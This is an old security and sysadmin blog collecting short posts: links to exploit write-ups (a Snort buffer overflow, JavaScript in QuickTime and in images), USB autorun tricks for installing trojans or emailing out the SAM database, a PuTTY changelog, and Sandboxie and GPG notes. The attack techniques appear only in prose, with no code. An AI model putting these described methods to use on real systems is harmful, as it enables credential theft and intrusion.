average admins

This is from another one of my favorite blogs: Didier Stevens.

I found this entry enjoyable because it’s yet another one of those “Owned by MySpace” posts. It’s also really well written and very easy to follow (even for a newcomer).

Here’s a link to the blog entry:
http://didierstevens.wordpress.com/2007/03/12/p0wned-by-a-qt-movie/

Embedding JavaScript inside a Quicktime movie is nothing new as GNUCitizen discussed back in September but it’s good to actually see that in the wild.

I haven’t read all of this yet, but it looks like an awesome article describing the research involved in finding the vulnerabilities and in writing the exploit code.

http://isc.sans.org/diary.html?storyid=2375

Building a remote buffer overflow for the Snort 2.6.1 DCE/RPC flaw
Published: 2007-03-07,
Last Updated: 2007-03-07 13:35:22 UTC
by Arrigo Triulzi (Version: 1)
Every so often I get asked about buffer overflow research in practice and for once there is a lengthy, worked-out example for me to point at.

Trirat Puttaraksa recently blogged in two parts his work in turning the Snort 2.6.1 DCE/RPC flaw into a working exploit. The first part discusses the “easy bit”, that is to say how to turn the vulnerability into a denial-of-service attack whereas the second part discusses how to exploit it to actually execute code.

It is a very thorough write-up, including pretty pictures explaining how he uses the Snort source code to figure out the layout of the packets he is going to send, the setup of the packets to ensure that he triggers the fault and, in part 2, how to inject the payload to execute. The final result is that he runs calc.exe from Snort.

http://scratchpad.wikia.com/wiki/Reverse_Engineering_Mentoring

Wow, this is very cool!

Didier Stevens has started a mentoring program to teach newbies how to reverse engineer software. The instructions are very well written and very easy to follow.

If you’re interested in RE, then this is a great place to start.

I’m a little late with this, but there’s a new version of PuTTY that’s finally been released. According to their changelog, there hasn’t been a PuTTY release since beta 0.58 was released in 2005-04-05.

You can download the file from here:
http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

And here’s a copy of the changelog. The feature I’m really looking forward to is the serial support (I currently use a program called TuTTY and another one called TeraTermPro).

* PuTTY can now connect to local serial ports as well as making network connections.
* Windows PuTTY now supports “local proxying”, where a network connection is replaced by a local command. (Unix PuTTY has supported this since it was first released in 0.54.) Also, Plink has gained a “-nc” mode where the primary channel is replaced by an SSH tunnel, which makes it particularly useful as the local command to run.
* Improved speed of SSH on Windows (particularly SSH-2 key exchange and public-key authentication).
* Improved SFTP throughput.
* Various cryptographic improvements in SSH-2, including SDCTR cipher modes, a workaround for a weakness in CBC cipher modes, and Diffie-Hellman group exchange with SHA-256.
* Support for the Arcfour cipher in SSH-2.
* Support for sending terminal modes in SSH.
* When Pageant is running and an SSH key is specified in the configuration, PuTTY will now only try Pageant authentication with that key. This gets round a problem where some servers would only allow a limited number of keys to be offered before disconnecting.
* Support for SSH-2 password expiry mechanisms, and various other improvements and bugfixes in authentication.
* A change to the SSH-2 password camouflage mechanism in 0.58 upset some Cisco servers, so we have reverted to the old method.
* The Windows version now comes with documentation in HTML Help format. (Windows Vista does not support the older WinHelp format. However, we still provide documentation in that format, since Win95 does not support HTML Help.)
* On Windows, when pasting as RTF, attributes of the selection such as colours and formatting are also pasted.
* Ability to configure font quality on Windows (including antialiasing and ClearType).
* The terminal is now restored to a sensible state when reusing a window to restart a session.
* We now support an escape sequence invented by xterm which lets the server clear the scrollback (CSI 3 J). This is useful for applications such as terminal locking programs.
* Improvements to the Unix port:
o now compiles cleanly with GCC 4
o now has a configure script, and should be portable to more platforms
* Bug fix: 0.58 utterly failed to run on some installations of Windows XP.
* Bug fix: PSCP and PSFTP now support large files (greater than 4 gigabytes), provided the underlying operating system does too.
* Bug fix: PSFTP (and PSCP) sometimes ran slowly and consumed lots of CPU when started directly from Windows Explorer.
* Bug fix: font linking (the automatic use of other fonts on the system to provide Unicode characters not present in the selected one) should now work again on Windows, after being broken in 0.58. (However, it unfortunately still won’t work for Arabic and other right-to-left text.)
* Bug fix: if the remote server saturated PuTTY with data, PuTTY could become unresponsive.
* Bug fix: certain large clipboard operations could cause PuTTY to crash.
* Bug fix: SSH-1 connections tended to crash, particularly when using port forwarding.
* Bug fix: SSH Tectia Server would reject SSH-2 tunnels from PuTTY due to a malformed request.
* Bug fix: SSH-2 login banner messages were being dropped silently under some circumstances.
* Bug fix: the cursor could end up in the wrong place when a server-side application used the alternate screen.
* Bug fix: on Windows, PuTTY now tries harder to find a suitable place to store its random seed file PUTTY.RND (previously it was tending to end up in C:\ or C:\WINDOWS).
* Bug fix: IPv6 should now work on Windows Vista.
* Numerous other bugfixes, as usual.

Originally posted at cocoacrusty.com on Monday, February 12th, 2007.

This evening I decided to install some applications I used on FreeBSD before I got my Apple MacBook. I used to thoroughly enjoy the FreeBSD ports system for maintaining 3rd-party applications like Wireshark (formerly known as Ethereal) and Nmap. Since moving to Mac I have found a similar ports system named MacPorts, formerly known as DarwinPorts.

I have used the MacPorts system in the past to install the above mentioned applications, Wireshark and Nmap, as well as screen (great tutorial on TechSays, previously posted at averageadmins.com) and Ettercap. I got crazy with the MacPorts tonight and started installing some of the software that I used to use on my FreeBSD laptop as well as some newer applications I wanted to try out. I installed:

(more…)

I remember reading a cool article a long time ago about how it was possible for someone to create a backdoored image and use it to gain access to the internal network of the company he was targeting. The article was called Wardriving Into GIAC Enterprises with JPEG’s and is available here: http://www.giac.org/certified_professionals/practicals/gcih/0651.php

Well, apparently it’s STILL possible to backdoor an image, but this time it’s with JavaScript. I don’t know JavaScript very well but I can only assume that it’s possible to code a quick script to download any imaginable tool and execute it.

http://www.gnucitizen.org/blog/backdooring-images

Surely you’ve heard of how it’s possible, by just visiting a website, to have a JavaScript script sent to your computer which can do any number of things … such as port scanning your internal network, for example. SPIDynamics has written a POC that does just that. You can read about there here: http://www.spidynamics.com/spilabs/education/articles/JS-portscan.html. Now you know how to incorporate that code in a simple image.

If you want to test this out yourself and you don’t have a webserver for uploading images, try downloading XAMPP and setting up a webserver on your local machine. It’s perfect for testing web applications such as this.

I ran across a few articles yesterday while doing some catching up on old blogs I haven’t read in a while.

Everyone probably knows that if you get a new USB key it comes with a U3 partition. And I’m also sure that everyone knows you can hack that U3 partition to automatically install and run whatever software you want (trojans, spyware, pull the SAM database and email it somewhere, ..etc).

However, did you know you can do the same thing with an old non-U3 USB key? It works roughly the same way. You create an autorun.inf file and stick it in the root of your key. When it is inserted into an XP SP2 machine, it pops up and presents the user with the standard “What do you want to do with this thing” window. The autorun file can be programmed to include a custom action with a custom icon that resides at the top of the pop up window.

(more…)

In trying to get my new MacBook in shape for everyday use (if I decide to switch from my 15.4″ widescreen FreeBSD laptop), I decided to see if I could get Thunderbird setup with GnuPG (GPG) for signing and encrypting e-mail. I had a pretty easy experience figuring this stuff out although there was a few things that weren’t explained very well, in my opinion, and I want to document the process I went through to get this working on Mac OS X 10.4.8 for any others out there who may be interested. Having it all in one place will do me well if any reinstalls come about in the future.

(more…)

Linked from [Geeks are Sexy], here are 14 ways to protect your computers. This list is mainly geared towards the IT admin who has a large network of computers to manage, but some of them can be used by the single-PC person.

Most of these are really, really good.

I think this one would be a lot of fun:

12. Track where everyone browses on the Internet and for how long. Post the findings on a real-time online report that is accessible by anyone. This recommendation tends to make users’ Internet surfing habits self-policing. (I bet it will also lead to a sudden increase in productivity.)

http://geeksaresexy.blogspot.com

The term “sandbox” means to run code in a virtual enviornment so as not to harm the underlying system.

I have heard of the term “sandboxing” but have never really looked into running any applications in a sandboxed environment. While posting an earlier entry, I read of a guy running his Firefox in a program called Sandboxie so I decided to give it a try.

I installed Sandboxie and ran an instance of Firefox in it. Everything I did with my sandboxed Firefox was kept away from my running system: all registry entries, bookmark additions and deletions, browsing history, downloaded software (inclusing malware), everything.

The best part of it all is that after you’re done browsing (or whatever application you’re using) you simply delete the sandbox and all traces of it are gone. Well, not ALL traces as it does touch your hard drive so if you were to run a disk forensics scan it would find traces of your sandboxed activity. Fortunately, Sandboxie has already thought of that so they offer a way for you to integrate your existing favorite secure disk wiping application with their delete function. It does require editting the registry, however.

The author of Sandboxie is providing this software free of charge. After 30 days of use, the program will popup “reminders” asking you to kindly pay the $20 lifetime registration fee that gives you not only tech support but also a few other cool software additions like letting you know when software was launched outside of the sandbox (like a trojan install). The paid version also lets you automatically sandbox specific programs even if they weren’t launched inside the sandbox. Registered users can also have as many sandboxes open as they want, whereas the free version only allows one.

Of course, if you ask me, Linux is the best sandbox I’ve ever used!

http://www.sandboxie.com/